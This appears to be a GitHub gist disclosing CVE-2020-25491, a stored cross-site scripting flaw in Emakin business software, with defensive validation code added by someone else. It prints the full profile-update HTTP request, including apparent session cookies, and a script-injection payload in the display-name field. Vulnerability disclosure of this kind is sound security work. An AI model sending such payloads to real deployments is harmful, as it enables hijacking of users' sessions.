@mhmtayberk
Last active December 6, 2021 23:43
CVE-2020-25491

What is Emakin?

Emakin is business software marketed on Process Improvement, Teamwork, Mobility, Compatibility, Safety and Security, Reduced Costs, Higher Revenue and a Single Platform for businesses.

Companies using Emakin include VakıfBank, Ülker, Katılım Emeklilik, Sabancı, Aegon, Eczacıbaşı, Godiva, Tarsim, A101, Near East Bank and various other institutions.

Based on the companies using Emakin, we can say that the software is used extensively in Turkey.

What is CVE-2020-25491?

CVE-2020-25491 is a basic stored XSS. The vulnerability itself is simple.

The "Display Name" field in the profile editing area (https://vulnerable.com/app/#/profile), reached from the top menu, is affected by this vulnerability.

Request:

POST /rpc/membership/setProfile HTTP/1.1
Host: vulnerable.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 807
Origin: https://vulnerable.com
Connection: close
Referer: https://vulnerable.com/app/
Cookie: _fbp=fb.2.1598889391208.495488426; cultPref=en-US; cookieToken=D5D4DB9DB3DAD8D77D8C522DCF252136F15DAA85C5F217D42F34EAB79E6F30D346CE7128F84A53911E9E81B947E4ED4D2384F649CDCE2ED20FC53ED1E6CAC816977884D841DD7EAAA9C378E9CB37F51103E7A42B; AKOpenAuth=C52389963AF70A290721BC7C7B4BE9F062152850C92C5C9B48AB80ED00EFCCF074D63D56C2C340EC61802827BEAFF995; .ASPXAUTH=5F48AA8100055D6A13A71418D07796D507B770DA1FD64EC7BBBF367E464FD06A585C11D72EB6383F6E05465862E7025FA37498078450FB797AC4E2EC0DDA1BC99FB0E76B389F78F64F3DA853290CFE4D124E9BAE40F0F231C1C61756483B5A0E7645D713181693BBF1927933791D5D0EBAF52FE1A30A1829E6B7DF795152E333F85719315F606AE9383EF427CC842F1D4B15D12D178108E332CE7387AC74EE932B0300853BF62B000BC321A49B28CDD983D70DABFB45E1565DAD7068FC6C4CD201EE40171A31694C554F0470206EEC1DA1A505D0

{"profile":"<UserProfile><Properties><Name/><Surname/><DisplayName>&lt;script&gt;alert('1337')&lt;/script&gt;</DisplayName><EMailAddress>mail@vulnerable.com</EMailAddress><Language Caption=\"English (American Samoa)\">en-AS</Language><DateFormat Caption=\"Auto Format\"/><Theme Caption=\"Default\"/></Properties><DomainTheme>Blocks</DomainTheme><Themes><Theme>Blocks</Theme><Theme>Blue</Theme><Theme>Clean</Theme><Theme>Sun</Theme></Themes><Ticket>E52FEF99EB0C4A5FED7AE7AF917040A732C0C69182F331CBC4D0F3F0689246AB1E61492A11C75F61E0989CA9B09E553E7FBA7E7F850D9F872E5FE3BCAFC38359C3E01C53D8E83D2FABE270455C200866182ADDBA</Ticket><Logons><Logon><Provider>Organization</Provider></Logon><Logon><Provider>LDAP</Provider></Logon></Logons><ImageFile Caption=\"\" Url=\"\"/><ImageUrl/></UserProfile>"}

As you can see, the payload (sent entity-encoded inside the XML <DisplayName> element) is: <script>alert('1337')</script>

The stored payload then triggers on the Activity Stream (https://vulnerable.com/app/#/activitystream) and Work Item (https://vulnerable.com/app/#/workitem/WorkItemId) pages.
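As an added example (not from the original gist or from Emakin), the following Python shows how a defender can handle the setProfile request shape above: extract DisplayName from the JSON-wrapped UserProfile XML, reject it against a server-side allow-list, and apply contextual output encoding wherever the name is rendered. The sample body is constructed here, modelled on the request on this page; the allow-list pattern and the function names are assumptions.

```python
import html
import json
import re
import xml.etree.ElementTree as ET

# Constructed request body, modelled on the POST /rpc/membership/setProfile
# body shown above (the XML is entity-encoded inside a JSON string).
SAMPLE_BODY = json.dumps({
    "profile": "<UserProfile><Properties><Name/><Surname/>"
               "<DisplayName>&lt;script&gt;alert('1337')&lt;/script&gt;</DisplayName>"
               "<EMailAddress>mail@vulnerable.com</EMailAddress>"
               "</Properties></UserProfile>"
})

# Assumed allow-list for a display name: letters, digits, space, dot,
# apostrophe, hyphen, 1-64 characters. Any markup character fails it.
ALLOWED_DISPLAY_NAME = re.compile(r"^[\w .'\-]{1,64}$")


def display_name_from_body(body: str) -> str:
    """Return the decoded DisplayName text from a setProfile JSON body.

    The XML parser decodes &lt;/&gt; back to </>, so the value returned is
    exactly what the application would later store and render.
    """
    profile_xml = json.loads(body)["profile"]
    root = ET.fromstring(profile_xml)
    node = root.find("./Properties/DisplayName")
    return (node.text or "") if node is not None else ""


def is_safe_display_name(name: str) -> bool:
    """Server-side input validation: accept only allow-listed characters."""
    return ALLOWED_DISPLAY_NAME.match(name) is not None


def render_display_name(name: str) -> str:
    """Output encoding for an HTML text context (Activity Stream, Work Item).

    Even if a bad value was stored, escaping at render time stops it from
    executing in the browser.
    """
    return html.escape(name, quote=True)


if __name__ == "__main__":
    name = display_name_from_body(SAMPLE_BODY)
    print("decoded DisplayName :", name)
    print("passes allow-list   :", is_safe_display_name(name))
    print("safe HTML rendering :", render_display_name(name))
```

Both controls are needed: validation blocks the value at setProfile time, and output encoding protects pages that render names stored before the fix.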

For more details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-25491

For more blogposts: https://ayberk.ninja/
